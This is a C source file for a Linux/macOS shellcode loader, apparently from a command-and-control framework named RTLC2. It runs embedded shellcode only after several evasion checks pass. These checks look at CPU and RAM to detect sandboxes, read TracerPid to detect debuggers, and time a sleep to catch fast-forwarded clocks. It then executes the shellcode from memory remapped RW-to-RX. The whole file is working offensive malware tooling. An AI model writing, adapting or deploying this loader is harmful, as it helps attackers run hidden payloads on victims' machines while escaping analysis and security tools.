/* =========================================================================
 * RTLC2 Shellcode Loader - Linux / macOS (POSIX)
 * Standalone binary that loads and executes embedded shellcode with evasion
 * ========================================================================= */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <time.h>

/* Shellcode data - generated by build script */
#include "shellcode_data.h"

/* ---- Evasion: Hardware checks ---- */
static int check_hardware(void) {
    long cpus = sysconf(_SC_NPROCESSORS_ONLN);
    if (cpus < 2) return 0;

    long pages = sysconf(_SC_PHYS_PAGES);
    long page_size = sysconf(_SC_PAGE_SIZE);
    unsigned long long ram = (unsigned long long)pages * (unsigned long long)page_size;
    if (ram < 2ULL * 1024 * 1024 * 1024) return 0;

    return 1;
}

/* ---- Evasion: Debugger check (Linux) ---- */
static int check_debugger(void) {
#ifdef __linux__
    FILE *f = fopen("/proc/self/status", "r");
    if (f) {
        char line[256];
        while (fgets(line, sizeof(line), f)) {
            if (strncmp(line, "TracerPid:", 10) == 0) {
                int pid = atoi(line + 10);
                fclose(f);
                if (pid != 0) return 0; /* Being debugged */
                return 1;
            }
        }
        fclose(f);
    }
#endif
    return 1;
}

/* ---- Evasion: Timing check ---- */
static int check_timing(void) {
    struct timespec t1, t2, req;
    clock_gettime(CLOCK_MONOTONIC, &t1);

    req.tv_sec = 1;
    req.tv_nsec = 500000000; /* 1.5s */
    nanosleep(&req, NULL);

    clock_gettime(CLOCK_MONOTONIC, &t2);
    long elapsed_ms = (t2.tv_sec - t1.tv_sec) * 1000 +
                      (t2.tv_nsec - t1.tv_nsec) / 1000000;
    if (elapsed_ms < 1000) return 0; /* Fast-forwarded */
    return 1;
}

/* ---- Main ---- */
int main(void) {
    /* Evasion checks */
    if (!check_hardware())  return 0;
    if (!check_debugger())  return 0;
    if (!check_timing())    return 0;

    /* Allocate RW memory */
    void *mem = mmap(NULL, shellcode_len,
                     PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return 1;

    /* Copy shellcode */
    memcpy(mem, shellcode, shellcode_len);

    /* Change to RX */
    if (mprotect(mem, shellcode_len, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, shellcode_len);
        return 1;
    }

    /* Execute */
    ((void (*)(void))mem)();

    /* Cleanup (unreachable if shellcode takes over) */
    munmap(mem, shellcode_len);
    return 0;
}
